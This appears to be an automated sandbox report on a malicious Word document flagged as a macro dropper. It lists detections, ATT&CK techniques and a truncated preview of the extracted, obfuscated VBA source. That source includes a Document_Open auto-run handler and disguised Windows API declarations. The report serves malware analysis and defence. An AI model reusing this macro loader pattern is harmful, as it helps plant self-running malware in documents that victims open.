MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The ClamAV detection 'Doc.Dropper.Agent-6361726-0' strongly suggests a dropper functionality. The VBA code itself appears to be obfuscated and contains complex logic, but its presence and the heuristic firings indicate an intent to download and execute further malicious content.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6361726-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6361726-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15497 bytes |
SHA-256: 21b917a8e49719fa902e39715aff0f60d0574a1b98b668e80d42a563c6a1477f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub GenerateGlossary() Dim strSource As String Dim strDestination As String Dim strGlossaryName As String strSource = ActiveWindow.Caption strGlossaryName = "word" Documents.Add ActiveDocument.SaveAs FileName:=strGlossaryName, FileFormat:=wdFormatDocument strDestination = ActiveWindow.Caption Windows(strSource).Activate End Sub Function ballroom() Dim athyrium As Integer Dim accompanist As Variant tabanidae.quartett.Value = Day(#12/5/2013#) varday = gratia = "cadmiumyellow" nonadjacent = "florist" dolichos = "chlorophyll" institutionally = "bottommost" stomatous = "stranger" entrenchment = "fritillary" bromeliaceae = "accepted" Set usurpation = tabanidae.quartett.SelectedItem agas = 77 bowhead = 16177 luwian = 443598 Pmt 0, agas, 30643, 29401, 8 schinus = usurpation.Name pendulate = 75 - 123 + 7892 attributed = Right(schinus, pendulate) acquiescent = Module2.ancientness(attributed) declarative = 111 banderilla = 29277 meadowlark = 185189 Pmt 0, declarative, 21896, 15307, 6 bryanthus = "accouterments" #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim constituent As Variant Dim gynecological As LongPtr Dim beige As LongPtr Dim beatify As Variant #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim maternally As Byte Dim beige As Long Dim imperium As String Dim gynecological As Long #End If mamma = 10 - 15 + 5 dismantling = chloranthaceae designed = 120 - 128 + 4104 skit = 100 + 9 beams = 10400 + 2 peripheral = 457170 + 8 Pmt 0, skit, 39930, 12929, 2 mediocrity = "cruciform" eddish = "chanterelle" foolishly = "dosed" jesuitism = 10 + 8 cludless = 30990 + 7 bornite = 352850 + 3 Pmt 0, jesuitism, 29547, 35922, 8 cumbersome = acquiescent sideration = "cryptogamia" gynecological = proneness(cumbersome) flint = "jobbernowl" inessential = "fleckered" #If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then Dim persuaded As Integer Dim invention As LongPtr Dim expressiveness As LongPtr Dim confectionary As LongPtr aboideau = 87 - 50 + 2027 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim invention As Long trey = 68 - 89 + 802 Dim expressiveness As Long Dim confectionary As Long aboideau = trey + 3459 #End If Dim civilly As Long Dim ceromancy As Variant invention = 45 - 74 + 29 beige = gynecological + aboideau expressiveness = 86 - 50 + 201491 confectionary = 65 - 90 + 3525 attaghan = embranglement(expressiveness, invention, beige, invention, invention, invention, invention) energetic = 110 + 6 dreamer = 32970 + 3 sourdet = 291690 + 6 Pmt 0, energetic, 38479, 50050, 7 End Function Private Sub Document_Open() Dim powerfully As String Dim bush As Variant aged = "punctuality" ballroom clofibrate = 40 + 5 asclepiad = 5590 + 0 headstand = 253450 + 7 Pmt 0, clofibrate, 3845, 36213, 8 End Sub Attribute VB_Name = "Module1" ' And walked out ' Hit me like a hurricane #If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (28 - 7 * 4) * 2 Then ' Started talking bout us again ' Rain was driving, thunder, lightning Public Declare PtrSafe Function thryothorus Lib "ntdll.dll" Alias "NtCreateEventPair" (droit As LongPtr, cotangent As LongPtr, ambystomatidae As LongPtr) As LongPtr ' The moon went hiding, stars quit shining ' You wrecked my whole world when you came Public Declare PtrSafe Function dysgenics Lib "Kernel32.dll" Alias "CreateEventW" (ByVal ackee As LongPtr, asinorum As LongPtr, cervus As LongPtr, velvety As LongPtr, auxilia As LongPtr) As Long ' Hit me like a hurricane ' Rain was driving, thunder, lightning Public Declare PtrSafe Function takes Lib "ntdll.dll " Alias "AcquireSRWLockShared" (realty As Any) As LongPtr ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.